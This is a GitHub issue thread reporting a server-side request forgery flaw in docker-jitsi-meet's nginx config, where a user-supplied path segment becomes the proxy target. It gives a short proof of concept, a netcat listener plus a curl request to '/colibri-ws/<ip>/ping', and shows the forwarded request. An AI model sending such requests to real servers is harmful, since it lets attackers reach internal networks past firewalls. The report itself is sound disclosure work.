### ISSUE TITLE
Dangerous nginx config

### ISSUE THREAD

**Issue by immerda** [jitsi/docker-jitsi-meet#1305]
The nginx config in this setup uses a user controlled string as proxy target on [this](https://github.com/jitsi/docker-jitsi-meet/blob/master/web/rootfs/defaults/meet.conf#L57) line. 

To reproduce:

1. On any machine (assume its ip is 1.2.3.4) reachable from the jitsi-meet instance start `nc -l 9090`.
2. `curl https://my-jitsi-url.com/colibri-ws/1.2.3.4/ping`

The jitsi instance will then forward the GET request to 1.2.3.4, where you see

```
GET /colibri-ws/1.2.3.4/ping HTTP/1.1
Upgrade: WebSocket
Connection: upgrade
Host: 1.2.3.4:9090
user-agent: curl/7.79.1
accept: */*
X-Forwarded-For: ::1
X-Forwarded-Host: my-jitsi-urs.com
X-Forwarded-Server: my-jitsi-urs.com
```

This is imho a pretty serious security issue and should be fixed! Why?

This allows (unauthenticated) attackers to access resources in the local network and bypassing firewalls. Additionally, it allows to proxy websocket requests through the server, which e.g. allows bypassing cors, piggybacking on the ssl cert, and so on.

**Comment by saghul** [comment]
Please follow https://github.com/jitsi/docker-jitsi-meet/pull/1175
